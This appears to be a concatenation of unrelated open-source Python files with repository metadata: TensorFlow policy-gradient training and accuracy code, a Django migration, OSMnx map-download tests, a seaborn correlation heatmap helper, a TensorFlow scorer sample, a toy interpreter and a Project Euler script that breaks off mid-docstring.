# logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
# labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
# labels = tf.cast(labels, dtype)
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # softmax_cross_entropy_with_logits
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights)
# return cross_entropy
# def weighted_cross_entropy_loss(logits, future_rewards, actual_reward, weights):
# """Optimizing expected reward: Weighted cross entropy
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# """
# with tf.variable_scope('WeightedCrossEntropyLoss') as scope:
# # Get Weights: External reward - Predicted reward
# actual_reward = tf.reshape(tf.tile(actual_reward, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = future_rewards - actual_reward # actual_reward - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits for argmax and argmin
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get labels if predicted using these logits
# logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
# labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
# labels = tf.cast(labels, dtype)
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # softmax_cross_entropy_with_logits
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights)
# # Multiply with reward
# cross_entropy = tf.mul(cross_entropy, diff_act_pred)
# # Cross entroy / document
# cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
# tf.add_to_collection('reward_cross_entropy_loss', cross_entropy_mean)
# # # # The total loss is defined as the cross entropy loss plus all of
# # # # the weight decay terms (L2 loss).
# # # return tf.add_n(tf.get_collection('losses'), name='total_loss')
# return cross_entropy_mean
### Training functions
def train_cross_entropy_loss(cross_entropy_loss):
    """Build the supervised pretraining op for the policy network.

    Pretraining against gold labels gives the policy network a better
    starting policy before policy-gradient training.

    Args:
      cross_entropy_loss: Scalar cross-entropy loss tensor.

    Returns:
      An op that applies Adam updates to the PolicyNetwork variables.
    """
    with tf.variable_scope('TrainCrossEntropyLoss') as scope:
        adam = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
        # Restrict the update to the policy network's trainable variables.
        trainable_policy_vars = tf.get_collection(
            tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
        gradient_pairs = adam.compute_gradients(
            cross_entropy_loss, var_list=trainable_policy_vars)
        return adam.apply_gradients(gradient_pairs)
def train_meansq_loss(futreward_meansq_loss):
    """Build the training op for the future-reward estimator.

    Args:
      futreward_meansq_loss: Scalar mean-squared-error loss tensor.

    Returns:
      An op that applies Adam updates to the FutureRewardEstimator
      variables.
    """
    with tf.variable_scope('TrainMeanSqLoss') as scope:
        adam = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
        # Only the reward-estimator variables are updated by this loss.
        estimator_vars = tf.get_collection(
            tf.GraphKeys.TRAINABLE_VARIABLES, scope="FutureRewardEstimator")
        gradient_pairs = adam.compute_gradients(
            futreward_meansq_loss, var_list=estimator_vars)
        return adam.apply_gradients(gradient_pairs)
def train_neg_expectedreward(reward_weighted_cross_entropy_loss_multisample):
    """Training with Policy Gradient: Optimizing expected reward.

    Args:
      reward_weighted_cross_entropy_loss_multisample: Scalar loss tensor
        (cross entropy weighted by the sampled rewards).

    Returns:
      An op that applies norm-clipped Adam gradients to the
      PolicyNetwork variables.
    """
    with tf.variable_scope('TrainExpReward') as scope:
        optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
        # Only the policy network is updated by the policy-gradient loss.
        policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
        grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_loss_multisample, var_list=policy_network_variables)
        # Clip gradient norms: Pascanu et al. 2013, exploding gradient problem.
        # Guard against None gradients: compute_gradients yields (None, var)
        # for variables the loss does not depend on, and
        # tf.clip_by_norm(None, ...) would raise.
        grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var)
                                      for grad, var in grads_and_vars
                                      if grad is not None]
        # Apply Gradients
        return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def train_neg_expectedreward(reward_weighted_cross_entropy_loss):
# """Training with Policy Gradient: Optimizing expected reward
# args:
# reward_weighted_cross_entropy_loss
# """
# with tf.variable_scope('TrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_loss, var_list=policy_network_variables)
# # print(grads_and_vars)
# # Clip gradient: Pascanu et al. 2013, Exploding gradient problem
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# # Apply Gradients
# # return optimizer.apply_gradients(grads_and_vars)
# return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def train_neg_expectedreward(logits, d_ltheta_ot):
# """Training with Policy Gradient: Optimizing expected reward
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# d_ltheta_ot: Placeholder [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# """
# with tf.variable_scope('TrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Modify logits with d_ltheta_ot
# logits = tf.mul(logits, d_ltheta_ot)
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables)
# # print(grads_and_vars)
# # Clip gradient: Pascanu et al. 2013, Exploding gradient problem
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# # Apply Gradients
# # return optimizer.apply_gradients(grads_and_vars)
# return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def temp_train_neg_expectedreward(logits, d_ltheta_ot):
# with tf.variable_scope('TempTrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Modify logits with d_ltheta_ot
# logits = tf.mul(logits, d_ltheta_ot)
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables)
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# grads_and_vars_capped_val = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in grads_and_vars]
# # tf.clip_by_norm(t, clip_norm, axes=None, name=None)
# # https://www.tensorflow.org/versions/r0.11/api_docs/python/train/gradient_clipping
# return grads_and_vars, grads_and_vars_capped_norm, grads_and_vars_capped_val
### Accuracy Calculations
def accuracy(logits, labels, weights):
    """Estimate accuracy of predictions.

    Args:
      logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      labels: Sentence extraction gold labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]

    Returns:
      Accuracy: scalar tensor. With FLAGS.weighted_loss, the per-document
      accuracy (padding masked out) averaged over the batch; otherwise the
      plain mean over all sentence positions.
    """
    with tf.variable_scope('Accuracy') as scope:
        logits = tf.reshape(logits, [-1, FLAGS.target_label_size])  # [batch*doc_len, label_size]
        labels = tf.reshape(labels, [-1, FLAGS.target_label_size])  # [batch*doc_len, label_size]
        correct_pred = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))  # [batch*doc_len]
        correct_pred = tf.reshape(correct_pred, [-1, FLAGS.max_doc_length])  # [batch, doc_len]
        correct_pred = tf.cast(correct_pred, tf.float32)
        # Original code built the unweighted mean unconditionally and then
        # shadowed it in the weighted branch, leaving a dead graph op and a
        # second op with a colliding 'accuracy' name; build exactly one.
        if FLAGS.weighted_loss:
            # Mask padded sentences, average per document, then over the batch.
            correct_pred = tf.multiply(correct_pred, weights)
            correct_pred = tf.reduce_sum(correct_pred, reduction_indices=1)  # [batch]
            doc_lengths = tf.reduce_sum(weights, reduction_indices=1)  # [batch]
            correct_pred_avg = tf.div(correct_pred, doc_lengths)
            accuracy = tf.reduce_mean(correct_pred_avg, name='accuracy')
        else:
            accuracy = tf.reduce_mean(correct_pred, name='accuracy')
        return accuracy
# Improve it to show exact accuracy (top three ranked ones), not all.
| [
"zxzxzxzxz803@naver.com"
] | zxzxzxzxz803@naver.com |
21a5bab623131e69766e639509e8c1e67a713fe7 | d9eae6dd43848c50bdecc1fba5b7197c0e91fbf3 | /ituro_website/post/migrations/0016_auto_20170219_1934.py | 7ba2857c8c081fb8ff6bc5083cf79c62174c9b10 | [
"MIT"
] | permissive | Batuortal/ituro_website | 38045c7ad2ffe288fe1bd9ce2a5dd4304251c678 | f63948b99a03245c905a0cc9318e9509c91175e8 | refs/heads/master | 2021-01-01T19:09:41.871036 | 2017-07-27T12:15:19 | 2017-07-27T12:15:19 | 98,529,284 | 2 | 0 | null | 2017-07-27T11:43:52 | 2017-07-27T11:43:52 | null | UTF-8 | Python | false | false | 472 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2017-02-19 19:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: relax categoryentry.path_model to an
    # optional TextField (blank and NULL allowed).

    dependencies = [
        ('post', '0015_categoryentry_path_model'),
    ]

    operations = [
        migrations.AlterField(
            model_name='categoryentry',
            name='path_model',
            field=models.TextField(blank=True, null=True),
        ),
    ]
| [
"celaleddinhidayetoglu@gmail.com"
] | celaleddinhidayetoglu@gmail.com |
4a196cd4f4e92e6b42f9a4e0df6489a41ad1cdfe | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/1/c8n.py | a152200db7ea0c68b8daebb0c4d24d5fe2909fef | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
    # Interpret a c8N print command (Python 2 syntax).
    # lineRemaining is a list of whitespace-split tokens; it must start and
    # end with a lone double-quote token.
    if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
        if len(lineRemaining) > 2:
            # data to print: drop the surrounding quote tokens and join
            lineRemaining = lineRemaining[1:-1]
            print ' '.join(lineRemaining)
        else:
            # just the two quote tokens -> print an empty line
            print
def main(fileName):
    # Run every line of the given source file; each line must start with
    # the token 'c8N' followed by a quoted print payload. Any other
    # leading token prints ERROR and stops (Python 2 syntax).
    with open(fileName) as f:
        for line in f:
            data = line.split()
            if data[0] == 'c8N':
                printFunction(data[1:])
            else:
                print 'ERROR'
                return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
c1ac35f44e1b4a931797c9c87f2211e02c94e183 | c121241726b54e75741e48467807d14281fd0dc8 | /tests/__init__.py | 316a1b52b2401b80b87659829eaac537eb53a205 | [] | no_license | zeikomi552/githubapi-python-sample | fe44b7bd12af713cdf51125e42d022ea2f4d0d1e | 70d75fab654e343a20e80a2b391341176276ba1a | refs/heads/master | 2022-12-09T11:07:04.494279 | 2020-09-05T09:19:15 | 2020-09-05T09:19:15 | 286,598,982 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..')) | [
"68983834+zeikomi552@users.noreply.github.com"
] | 68983834+zeikomi552@users.noreply.github.com |
f01a21e3061792d927357110f3970d7c03ba9050 | 8ed86b8e9c451abcb2ce0ddf2f2067c11f3993d8 | /tests/test_osmnx.py | 33ec027e2986a7c620183d88cd5c271556bd3600 | [
"MIT"
] | permissive | surfcao/osmnx | 65830096c21b8353a536f776dfedba7de20eac4c | 51c9addb42425657fa6b11c7442f79f10b9e3e22 | refs/heads/master | 2021-01-19T23:32:40.068378 | 2017-04-19T20:22:01 | 2017-04-19T20:22:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,082 | py | """
OSMnx tests
-----------
"""
import matplotlib as mpl
mpl.use('Agg')  # use agg backend so you don't need a display on travis-ci
import os, shutil
# start every test run from a clean scratch directory
if os.path.exists('.temp'):
    shutil.rmtree('.temp')
import osmnx as ox, logging as lg
# route all osmnx data/logs/images/cache into .temp so the run is self-contained
ox.config(log_console=True, log_file=True, use_cache=True,
          data_folder='.temp/data', logs_folder='.temp/logs', imgs_folder='.temp/imgs', cache_folder='.temp/cache')
# smoke-test each logging level
ox.log('test debug', level=lg.DEBUG)
ox.log('test info', level=lg.INFO)
ox.log('test warning', level=lg.WARNING)
ox.log('test error', level=lg.ERROR)
def test_imports():
    """Smoke-test that every dependency the package relies on imports cleanly."""
    import json, math, sys, os, io, ast, unicodedata, hashlib, re, random, time, warnings, datetime as dt, logging as lg
    from collections import OrderedDict, Counter
    from itertools import groupby, chain
    from dateutil import parser as date_parser
    import requests, numpy as np, pandas as pd, geopandas as gpd, networkx as nx, matplotlib.pyplot as plt, matplotlib.cm as cm
    from matplotlib.collections import LineCollection
    from shapely.geometry import Point, LineString, Polygon, MultiPolygon
    from shapely import wkt
    from shapely.ops import unary_union
    from descartes import PolygonPatch
    from rtree.index import Index as RTreeIndex
def test_gdf_shapefiles():
    """Fetch a place boundary GeoDataFrame, project it, save it, and plot it."""
    city = ox.gdf_from_place('Manhattan, New York City, New York, USA')
    city_projected = ox.project_gdf(city, to_crs={'init':'epsg:3395'})
    ox.save_gdf_shapefile(city_projected)
    # re-fetch with a buffer and exercise the plotting path
    city = ox.gdf_from_place('Manhattan, New York City, New York, USA', buffer_dist=100)
    ox.plot_shape(city)
def test_network_saving_loading():
    """Round-trip a street network through shapefile, GraphML and GeoDataFrames."""
    G = ox.graph_from_place('Piedmont, California, USA')
    G_projected = ox.project_graph(G)
    ox.save_graph_shapefile(G_projected)
    ox.save_graphml(G_projected)
    G2 = ox.load_graphml('graph.graphml')
    # graph -> GeoDataFrames (edges only, then nodes+edges) -> graph again
    gdf_edges = ox.graph_to_gdfs(G, nodes=False, edges=True, fill_edge_geometry=False)
    gdf_nodes, gdf_edges = ox.graph_to_gdfs(G, nodes=True, edges=True, node_geometry=True, fill_edge_geometry=True)
    G3 = ox.gdfs_to_graph(gdf_nodes, gdf_edges)
def test_get_network_methods():
    """Exercise each graph_from_* constructor: bbox, point, address, place, polygon."""
    import geopandas as gpd
    north, south, east, west = 37.79, 37.78, -122.41, -122.43
    G1 = ox.graph_from_bbox(north, south, east, west, network_type='drive_service')
    G1 = ox.graph_from_bbox(north, south, east, west, network_type='drive_service', truncate_by_edge=True)
    location_point = (37.791427, -122.410018)
    bbox = ox.bbox_from_point(location_point, project_utm=True)
    G2 = ox.graph_from_point(location_point, distance=750, distance_type='bbox', network_type='drive')
    G3 = ox.graph_from_point(location_point, distance=500, distance_type='network')
    G4 = ox.graph_from_address(address='350 5th Ave, New York, NY', distance=1000, distance_type='network', network_type='bike')
    # mixed string/dict place queries in a single call
    places = ['Los Altos, California, USA', {'city':'Los Altos Hills', 'state':'California'}, 'Loyola, California']
    G5 = ox.graph_from_place(places, network_type='all', clean_periphery=False)
    # polygon-based query from a local neighborhoods shapefile
    calif = gpd.read_file('examples/input_data/ZillowNeighborhoods-CA')
    mission_district = calif[(calif['CITY']=='San Francisco') & (calif['NAME']=='Mission')]
    polygon = mission_district['geometry'].iloc[0]
    G6 = ox.graph_from_polygon(polygon, network_type='walk')
def test_stats():
    """Compute basic and extended network stats for a small graph."""
    location_point = (37.791427, -122.410018)
    G = ox.graph_from_point(location_point, distance=500, distance_type='network')
    stats1 = ox.basic_stats(G)
    stats1 = ox.basic_stats(G, area=1000)
    stats2 = ox.extended_stats(G, connectivity=True, anc=True, ecc=True, bc=True, cc=True)
def test_plots():
    """Exercise graph simplification, coloring, and the plot_graph / plot_figure_ground paths."""
    G = ox.graph_from_place('Piedmont, California, USA', network_type='drive', simplify=False)
    # non-strict vs strict simplification, plus attribute-based colors
    G2 = ox.simplify_graph(G, strict=False)
    nc = ox.get_node_colors_by_attr(G2, 'osmid')
    ec = ox.get_edge_colors_by_attr(G2, 'length')
    fig, ax = ox.plot_graph(G, save=True, file_format='png')
    G_simplified = ox.simplify_graph(G)
    fig, ax = ox.plot_graph(G_simplified, show=False, save=True, close=True, file_format='svg')
    G_projected = ox.project_graph(G_simplified)
    fig, ax = ox.plot_graph(G_projected)
    # hit every keyword argument of plot_graph at once
    fig, ax = ox.plot_graph(G_projected, fig_height=5, fig_width=5, margin=0.05, axis_off=False, bgcolor='y',
                            file_format='png', filename='x', dpi=180, annotate=True, node_color='k', node_size=5,
                            node_alpha=0.1, node_edgecolor='b', node_zorder=5, edge_color='r', edge_linewidth=2,
                            edge_alpha=0.1, use_geom=False, show=False, save=True, close=True)
    # figure-ground diagrams from a graph, a point, and an address
    fig, ax = ox.plot_figure_ground(G=G_simplified, file_format='png')
    fig, ax = ox.plot_figure_ground(point=(33.694981, -117.841375), file_format='png')
    fig, ax = ox.plot_figure_ground(address='Denver, Colorado, USA', file_format='png')
def test_routing_folium():
    """Find a shortest path and render it with matplotlib and folium."""
    import networkx as nx
    G = ox.graph_from_address('N. Sicily Pl., Chandler, Arizona', distance=800, network_type='drive')
    origin = (33.307792, -111.894940)
    destination = (33.312994, -111.894998)
    origin_node = ox.get_nearest_node(G, origin)
    destination_node = ox.get_nearest_node(G, destination)
    route = nx.shortest_path(G, origin_node, destination_node)
    attributes = ox.get_route_edge_attributes(G, route, 'length')
    fig, ax = ox.plot_graph_route(G, route, save=True, filename='route', file_format='png')
    fig, ax = ox.plot_graph_route(G, route, origin_point=origin, destination_point=destination,
                                  save=True, filename='route', file_format='png')
    # interactive folium renderings of the graph and the route
    graph_map = ox.plot_graph_folium(G, popup_attribute='name')
    route_map = ox.plot_route_folium(G, route)
def test_buildings():
    """Download building footprints by place and by address, then plot them."""
    gdf = ox.buildings_from_place(place='Piedmont, California, USA')
    gdf = ox.buildings_from_address(address='San Francisco, California, USA', distance=300)
    fig, ax = ox.plot_buildings(gdf)
| [
"gboeing@berkeley.edu"
] | gboeing@berkeley.edu |
1b2adbb82307321e2b0c0359cdf5b60612158d7c | 58d90b4e18d004db0148dbf9a8b8cf9f56e850aa | /build/lib/more/viz_helper/plot_corr.py | 389bb649238ba3996735d77b65a65d4679a313f1 | [
"MIT"
] | permissive | ngupta23/more | bacd831c6e0ba62dd97977c547f211c995077046 | c8d867d280c5c88be7d1ddfac37ff670a2dcaa29 | refs/heads/master | 2020-06-18T12:16:40.655308 | 2019-08-26T09:29:19 | 2019-08-26T09:29:19 | 196,301,026 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | import matplotlib.pyplot as plt
import seaborn as sns
def plot_corr(data, figsize=None, xrot=0, yrot=0):
    """
    Plot the pairwise correlation matrix of a DataFrame as an annotated heatmap.

    data: pandas DataFrame whose column correlations are computed and visualized
    figsize: Overall figure size for the overall plot
    xrot: (Default = 0) Rotate x-labels
    yrot: (Default = 0) Rotate y-labels
    """
    fig, axis = plt.subplots(1, 1, figsize=figsize)
    corr_mat = data.corr()
    # correlations rounded to 2 decimals; diverging colormap fixed to [-1, 1]
    sns.heatmap(round(corr_mat, 2), annot=True, cmap='RdBu', vmin=-1, vmax=1)
    axis.set_xticklabels(axis.get_xticklabels(), rotation=xrot)
    axis.set_yticklabels(axis.get_yticklabels(), rotation=yrot)
| [
"mywork.ng@gmail.com"
] | mywork.ng@gmail.com |
3c658b334f17c2ae83c718925f6c72f06ada900a | 9c48cc39d149e20bf0c25fae8029043ab43f8f06 | /recipes/tensorflow/samples/tensorflow/perceptron/samples/tensorflow/scorer.py | d51a992348c28fb52dcbe01c0fd9d4fa5869a858 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | DalavanCloud/experience-platform-dsw-reference | b4b6dd363b6fe6ed638db12d7e890af5e4f934dd | 2e0af85a47ec05b7cda77d61954c1cde0a625f5c | refs/heads/master | 2020-04-29T12:36:16.806332 | 2019-03-12T09:55:33 | 2019-03-12T09:55:33 | 176,142,668 | 1 | 0 | NOASSERTION | 2019-03-17T18:26:31 | 2019-03-17T18:26:31 | null | UTF-8 | Python | false | false | 1,518 | py | #
# Copyright 2017 Adobe.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ml.runtime.tensorflow.Interfaces.AbstractScorer import AbstractScorer
import tensorflow as tf
import numpy
class Scorer(AbstractScorer):
    def score(self, config={}):
        """Restore a saved TF (v1) linear model and score a fixed test vector.

        ``config`` must provide 'modelPATH' (checkpoint directory containing
        my_test_model-1000.meta) and 'logsPATH'.
        """
        # NOTE(review): mutable default argument ({}); it is never mutated
        # here, but confirm callers always pass an explicit config.
        print("Executed scorer 2")
        print(config["modelPATH"])
        print(config["logsPATH"])
        with tf.Session() as sess:
            # Rebuild the graph from the saved meta file and load the
            # latest checkpoint weights into the session.
            saver = tf.train.import_meta_graph(config["modelPATH"]+'/my_test_model-1000.meta')
            saver.restore(sess, tf.train.latest_checkpoint(config["modelPATH"]+'/'))
            graph = tf.get_default_graph()
            # Testing example, as requested (Issue #2)
            test_X = numpy.asarray([6.83, 4.668, 8.9, 7.91, 5.7, 8.7, 3.1, 2.1])
            X = tf.placeholder("float")
            W = graph.get_tensor_by_name("weight:0")
            b = graph.get_tensor_by_name("bias:0")
            # linear model: pred = X * W + b
            pred = tf.add(tf.multiply(X, W), b)
            p = sess.run(pred,feed_dict={X:test_X})
            print(p)
| [
"jlancar@adobe.com"
] | jlancar@adobe.com |
4fafbbfa074b3066c6e1510ea7acc4fff364b959 | 69c62b9e23a350bd97947b58e341d5e031956b2f | /in_progress/377.py | 7f2ae307b9d7b3d6b6f9b9b2f2fc4dfd4b6ef92a | [] | no_license | g-d-l/project_euler | 756fce982d7a3d44f8391bebcf04d2f368223a9a | 00b6c26afd96d5a849fe49ef0048bace1de634b6 | refs/heads/master | 2021-01-10T11:13:15.127212 | 2016-01-05T02:04:56 | 2016-01-05T02:04:56 | 49,035,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,759 | py | def digit_sum(n):
result = 0
while n > 0:
d = n % 10
result += d
n = n // 10
return result
def no_zero(n):
    """Return True if the decimal representation of n contains no '0' digit.

    Equivalent to the original if/else form, expressed as a single
    boolean expression.
    """
    return '0' not in str(n)
# Count, for numbers up to nine digits with digit sum n and no zero digits,
# how often each digit value (row: digit-1) appears in each position
# (column), then print the grid (Python 2: uses xrange).
n = 9
grid = [[0 for x in range(n)] for y in range(n)]
for i in xrange(111111111, -1, -1):
    if no_zero(i) and digit_sum(i) == n:
        # walk the digits of i from least significant, filling columns
        # right-to-left
        x = i
        c = n - 1
        while x > 0:
            grid[x % 10 - 1][c] += 1
            c -= 1
            x //= 10
for r in grid:
    print(r)
'''
13
1, 12, 67, 232, 562, 1024, 1486, 1816, 1981, 2033, 2040, 2040, 2040,
0, 1, 11, 56, 176, 386, 638, 848, 968, 1013, 1021, 1021, 1021,
0, 0, 1, 10, 46, 130, 256, 382, 466, 502, 511, 511, 511,
0, 0, 0, 1, 9, 37, 93, 163, 219, 247, 255, 256, 256,
0, 0, 0, 0, 1, 8, 29, 64, 99, 120, 127, 128, 128,
0, 0, 0, 0, 0, 1, 7, 22, 42, 57, 63, 64, 64,
0, 0, 0, 0, 0, 0, 1, 6, 16, 26, 31, 32, 32,
0, 0, 0, 0, 0, 0, 0, 1, 5, 11, 15, 16, 16,
0, 0, 0, 0, 0, 0, 0, 0, 1, 4, 7, 8, 8,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
12
1, 11, 56, 176, 386, 638, 848, 968, 1013, 1021, 1021, 1021,
0, 1, 10, 46, 130, 256, 382, 466, 502, 511, 511, 511,
0, 0, 1, 9, 37, 93, 163, 219, 247, 255, 256, 256,
0, 0, 0, 1, 8, 29, 64, 99, 120, 127, 128, 128,
0, 0, 0, 0, 1, 7, 22, 42, 57, 63, 64, 64,
0, 0, 0, 0, 0, 1, 6, 16, 26, 31, 32, 32,
0, 0, 0, 0, 0, 0, 1, 5, 11, 15, 16, 16,
0, 0, 0, 0, 0, 0, 0, 1, 4, 7, 8, 8,
0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 4, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
11
[1, 10, 46, 130, 256, 382, 466, 502, 511, 511, 511]
[0, 1, 9, 37, 93, 163, 219, 247, 255, 256, 256]
[0, 0, 1, 8, 29, 64, 99, 120, 127, 128, 128]
[0, 0, 0, 1, 7, 22, 42, 57, 63, 64, 64]
[0, 0, 0, 0, 1, 6, 16, 26, 31, 32, 32]
[0, 0, 0, 0, 0, 1, 5, 11, 15, 16, 16]
[0, 0, 0, 0, 0, 0, 1, 4, 7, 8, 8]
[0, 0, 0, 0, 0, 0, 0, 1, 3, 4, 4]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 2]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
10
[1, 9, 37, 93, 163, 219, 247, 255, 256, 256]
[0, 1, 8, 29, 64, 99, 120, 127, 128, 128]
[0, 0, 1, 7, 22, 42, 57, 63, 64, 64]
[0, 0, 0, 1, 6, 16, 26, 31, 32, 32]
[0, 0, 0, 0, 1, 5, 11, 15, 16, 16]
